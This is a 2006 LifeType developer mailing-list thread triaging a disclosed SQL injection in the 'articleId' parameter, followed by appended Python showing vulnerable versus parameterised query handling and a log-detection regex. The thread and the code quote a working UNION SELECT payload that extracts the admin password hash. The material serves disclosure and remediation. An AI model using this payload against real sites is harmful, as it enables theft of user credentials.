[pLog-svn] Fwd: LifeType <= 1.0.4 'articleId' SQL injection

Jon Daley plogworld at jon.limedaley.com
Sat Jun 3 22:41:41 GMT 2006


Ah, I turned on logging (turns out the slow logging isn't too bad for my 
site, so I don't mind turning it on now).

  152800 Query       SELECT a.id, a.date, a.user_id, a.blog_id, a.status, a.properties, a.num_reads, a.slug FROM articles a WHERE a.id = 9999/**/UNION/**/SELECT/**/password,1,1,1,1,1,1,1/**/FROM/**/users/**/WHERE/**/id=1/* AND a.blog_id = 1 AND a.status = 1


I will probably fix this shortly.


On Sat, 3 Jun 2006, Jon Daley wrote:

> 	It doesn't work on my 1.0.4 install either, only partially.  It does 
> get the (presumably, I didn't check) admin password (hashed) into the 
> sql_error.log, which isn't a security risk in itself, but obviously, being 
> able to change the SQL queries is bad.  I don't see what the /**/ stuff is 
> doing.  Surely the articleId is validated to be an integer, so where is all 
> that SQL getting assigned to?
>
> On Sun, 4 Jun 2006, Oscar Renalias wrote:
>
>> I couldn't get the linked script to work, but this is the interesting part 
>> of it:
>> 
>> http://www.yourhost.com/lifetype-1.0.4/index.php?op=ViewArticle&blogId=1&articleId=9999/**/UNION/**/SELECT/**/password,1,1,1,1,1,1,1/**/FROM/**/lt_users/**/WHERE/**/id=1/*
>> 
>> Clever.
>> 
>> On 4 Jun 2006, at 00:43, Oscar Renalias wrote:
>> 
>>> Whoops. Our first serious SQL injection issue!
>>> 
>>> Begin forwarded message:
>>> 
>>>> From: "rgod" <zerokool_556 at hotmail.com>
>>>> Date: 4 June 2006 00:30:31 GMT+03:00
>>>> To: <contact at lifetype.net>
>>>> Subject: LifeType <= 1.0.4 'articleId' SQL injection
>>>> 
>>>> http://retrogod.altervista.org/lifetype_104_sql.html
>>>> 
>>>> rgod
>>>> 
>>> 
>>> _______________________________________________
>>> pLog-svn mailing list
>>> pLog-svn at devel.lifetype.net
>>> http://devel.lifetype.net/mailman/listinfo/plog-svn
>>> 
>> 
>
> **************************************
> Jon Daley
> http://jon.limedaley.com/
>
> With memory prices this low, who needs to deallocate memory?
>

**************************************
Jon Daley
http://jon.limedaley.com/

Music has the uncanny ability to burrow
its way into our spiritual bones.
-- John Witvliet
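Added example, not LifeType's code and not from anyone on this thread: it shows how a query shaped like the logged one becomes injectable when the articleId request value is pasted into the SQL text, the two defensive changes that close it (strict integer validation plus a bound parameter), and a check a log reviewer could run over sql_error.log lines. Table and column names follow the logged query; the rows, the hash value and the helper names are constructed for the demo.

```python
"""Vulnerable vs. hardened handling of the 'articleId' value, plus a log check."""
import re
import sqlite3

# Column list taken from the query that appeared in the log.
COLUMNS = ("a.id, a.date, a.user_id, a.blog_id, a.status, a.properties, "
           "a.num_reads, a.slug")

# The injected value as it appeared in the logged query (the page's own payload).
LOGGED_ARTICLE_ID = ("9999/**/UNION/**/SELECT/**/password,1,1,1,1,1,1,1/**/FROM/**/"
                     "users/**/WHERE/**/id=1/*")


def build_query_vulnerable(article_id, blog_id):
    """Mirrors the flaw visible in the log: the request string lands in the SQL text,
    so an attacker-controlled articleId rewrites the statement (hypothetical code)."""
    return (f"SELECT {COLUMNS} FROM articles a WHERE a.id = {article_id} "
            f"AND a.blog_id = {blog_id} AND a.status = 1")


def parse_article_id(raw):
    """Fix 1: accept only a plain decimal integer; reject everything else up front."""
    if not re.fullmatch(r"[0-9]{1,10}", raw):
        raise ValueError(f"invalid articleId: {raw!r}")
    return int(raw)


def fetch_article(conn, raw_article_id, blog_id):
    """Fix 2: the validated integer travels as a bound parameter, never as SQL text."""
    article_id = parse_article_id(raw_article_id)
    sql = (f"SELECT {COLUMNS} FROM articles a WHERE a.id = ? "
           "AND a.blog_id = ? AND a.status = 1")
    return conn.execute(sql, (article_id, blog_id)).fetchall()


# Defender's side: flag logged queries that carry comment-separated UNION SELECTs.
INJECTION_MARKER = re.compile(r"/\*\*/|\bUNION\b.*\bSELECT\b", re.IGNORECASE)


def looks_injected(log_line):
    """True when a query log line shows the pattern seen in this thread."""
    return INJECTION_MARKER.search(log_line) is not None


def demo_db():
    """Constructed in-memory schema matching the logged query's table and columns."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE articles(id, date, user_id, blog_id, status, properties, num_reads, slug);
        CREATE TABLE users(id, password);
        INSERT INTO articles VALUES (1, '2006-06-03', 1, 1, 1, '', 0, 'hello');
        INSERT INTO users VALUES (1, 'constructed-hash-value');
    """)
    return conn
```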

